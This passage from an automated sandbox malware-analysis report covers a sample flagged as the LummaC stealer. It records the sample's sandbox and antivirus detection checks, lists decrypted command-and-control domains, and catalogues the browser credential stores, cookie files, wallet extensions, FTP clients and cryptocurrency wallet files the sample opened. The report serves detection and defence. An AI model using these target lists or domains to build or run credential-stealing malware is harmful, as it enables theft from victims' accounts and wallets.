              Source: Amcache.hve.0.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: Amcache.hve.0.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
              Source: Amcache.hve.0.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.0.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.0.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.0.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.0.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.0.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: Amcache.hve.0.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: C:\Users\user\Desktop\SDIO_R773.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              LummaC encrypted strings found
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: truculengisau.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: spookycappy.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: punishzement.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: nuttyshopr.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: marketlumpe.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: littlenotii.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: grandiouseziu.biz
              Source: SDIO_R773.exe, 00000000.00000002.2064388158.0000000000C10000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: fraggielek.biz
              Source: C:\Users\user\Desktop\SDIO_R773.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: Amcache.hve.0.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
              Source: Amcache.hve.0.drBinary or memory string: msmpeng.exe
              Source: Amcache.hve.0.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
              Source: SDIO_R773.exe, 00000000.00000003.2005093546.00000000047DC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %\Windows Defender\MsMpeng.exe
              Source: Amcache.hve.0.drBinary or memory string: MsMpEng.exe
              Source: C:\Users\user\Desktop\SDIO_R773.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
              Source: SDIO_R773.exeString found in binary or memory: Jaxx Liberty
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: SDIO_R773.exe, 00000000.00000003.2005003653.0000000000D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3E8Po*
              Source: SDIO_R773.exe, 00000000.00000003.2060690165.0000000000D21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: SDIO_R773.exe, 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: SDIO_R773.exe, 00000000.00000003.1985930366.0000000000D7F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: C:\Users\user\Desktop\SDIO_R773.exeDirectory queried: C:\Users\user\Documents\DVWHKMNFNNJump to behavior
              Source: Yara matchFile source: 00000000.00000003.1985877415.0000000000D74000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: SDIO_R773.exe PID: 7528, type: MEMORYSTR
